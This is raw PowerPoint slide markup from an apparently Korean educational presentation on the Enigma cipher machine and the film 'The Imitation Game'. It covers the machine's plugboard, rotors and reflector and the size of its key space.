              <a:tr h="80417">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61040702"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="80604">
                <a:tc rowSpan="1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36330169"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="152872">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5441990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948444135"/>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2404462"/>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47108898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1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781709824"/>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438102888"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="213929">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855849059"/>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19235825"/>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012911296"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="15287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3530213"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="122344">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0313057"/>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839190491"/>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1894799"/>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411618548"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="204735">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861112270"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="163788">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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1325950854"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="122841">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2543045"/>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8372165"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="그룹 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0454987-96BD-47FC-8931-3D15A6E225D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DBBBF0A-A234-46CC-B9D5-1A17F7ED7CA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4F541FD7-D7BA-4B45-B957-E372672195B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87E3033C-6FC3-4605-AB15-6FB518FBE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478675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ENIGMAISAHIGHLYTECHNICALLYDESIGNEDMACHINETHEPROBLEMISWEARETRYINGTOBEATTHISMACHINEWITHHUMANSWHATIFONLYOTHERMACHINESCOULDBEATTHISMACHINESOMETIMESSOMEONEYOUNEVEREVENTHOUGHTOFBECAUSETHEYDOTHINGSTHATNOONETHOUGHTOF</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Enigma is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>highly technically designed machine.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>The problem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, we are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>trying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>to beat this machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>with humans.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>only other machines could beat this machine?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Sometimes someone you never even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>thought of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Because they </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>do things that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>no one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>thought of.</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err="1"/>
              <a:t>에니그마는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 고도의 기술로 설계된 기계예요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>문제는 우리가 사람으로 이 기계를 이기려 하는 거죠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>만일 다른 기계만이 이 기계를 이길 수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>있다면요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가끔은 생각지도 못한 누군가가</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>누구도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>생각지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 못한 일을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>해내니깐요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="그룹 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3871165-E600-43E1-850A-A80FBA404116}"/>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4AA4D715-85BA-4552-8843-05CCC093FC6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E9CA405D-D9A5-47E4-865A-1C6BFC431BA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E2A67193-6CBE-4B0C-804E-86CA4560982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F3666324-9DA2-4FAD-B07D-A6A5DF9DF3BF}"/>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7612503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영화</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="그룹 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC074EC5-2787-4108-8FBB-BD25F36F0AC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4463994" y="2113575"/>
            <a:ext cx="2687542" cy="381664"/>
            <a:chOff x="1463040" y="2464903"/>
            <a:chExt cx="2687542" cy="381664"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="그룹 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BCAD334-A02B-40BA-9FB6-D667E9DF481B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1463040" y="2464904"/>
              <a:ext cx="628153" cy="381663"/>
              <a:chOff x="1463040" y="2464904"/>
              <a:chExt cx="628153" cy="381663"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="사각형: 둥근 모서리 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EC15E06-43E8-4A36-8A51-FB387789EE67}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1463040" y="2464904"/>
                <a:ext cx="628153" cy="381663"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 312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순서도: 추출 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B3FF5C-2C6C-4B2A-8E5E-716BC84839D0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="1715494" y="2570261"/>
                <a:ext cx="174928" cy="170950"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8CFC705-54BD-46CC-804F-00C9A3C1A9E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2091194" y="2464903"/>
              <a:ext cx="2059388" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                  <a:hlinkClick r:id="rId2"/>
                </a:rPr>
                <a:t>IMITATION GAME</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="세계대전을 호령한 암호 장치, 에니그마 : 네이버 포스트">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13304E49-F340-4E60-A2E7-CD62DC7FD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454" y="1923093"/>
            <a:ext cx="2687542" cy="40313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알라딘: [수입] The Imitation Game (이미테이션 게임) O.S.T [180g 투명 LP]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55597862-CE91-4471-A4AF-A3F568FD9D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1149" y="2840603"/>
            <a:ext cx="2809320" cy="28037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이미테이션 게임', 세상 등졌던 비운의 천재의 부활 - 오마이스타">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EBA7E39-8513-4659-ACB3-1B33E2CB53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3304" y="2495239"/>
            <a:ext cx="3642133" cy="254089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B691DAD8-D7EB-4F5E-884B-EED0CB7E4B4F}"/>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B7D1C12-879A-4B1D-BEB4-43D7368260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799CC20-5B26-47B8-B5EC-47FB5488FCB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6" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E0A43E6-F04B-46AF-8D01-1BDCC16FD9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화살표: 오른쪽 17">
            <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{605D5655-CB9C-4B72-94BE-B0E38F31EA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91688816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구조</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F2CF3D2-9BAB-442F-BB73-E6868774B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993127"/>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E2D953A-C997-43AB-8C9D-B8B84B6B7294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580444" y="5941358"/>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자판으로 입력한 알파벳 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>은 플러그보드와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>개의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>회전자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>반전자를 거쳐 알파벳 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>로 암호화되어 출력됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Plugboard: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>치환암호</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wheel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>값이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 바뀌는 치환암호</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,  Reflector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>암호화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>해독의 키를 같게 해주는 역할</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="그림 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F999454-62D1-4D89-B05D-AA4051F7871A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7553737" y="3469820"/>
            <a:ext cx="3458819" cy="1208321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="직선 화살표 연결선 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4701C614-3AA0-4509-B6A5-C9C5DEF8F2BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6119853" y="4073981"/>
            <a:ext cx="1433884" cy="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A956160A-116D-49B8-B3AE-B754B6215750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6836795" y="2034206"/>
            <a:ext cx="2356961" cy="1255210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="직선 화살표 연결선 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62E09594-AC81-446F-8BE3-D58804FBFA52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5279666" y="2480556"/>
            <a:ext cx="155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그림 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7DE6824-1111-421E-B1E1-4F6DD425933F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9193756" y="1701613"/>
            <a:ext cx="2241605" cy="1587803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="그룹 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{407B068C-ED2A-4C38-ABD1-4BC5ECA4C69E}"/>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18A12F8-65D2-48BF-BDC8-83571EFD13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A0B22D11-E68E-49B2-B082-65241A8797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6" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D576ABF-EC5E-4B87-82CA-363693F456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화살표: 오른쪽 19">
            <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6D7BD68-3F26-4242-8396-337C715358E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97188681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해독</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE2D953A-C997-43AB-8C9D-B8B84B6B7294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1153931" y="1960399"/>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키의 개수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>17,576</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>  *  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>  *  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>100,391,791,500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>가지  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>- brute force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>은 불가능함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
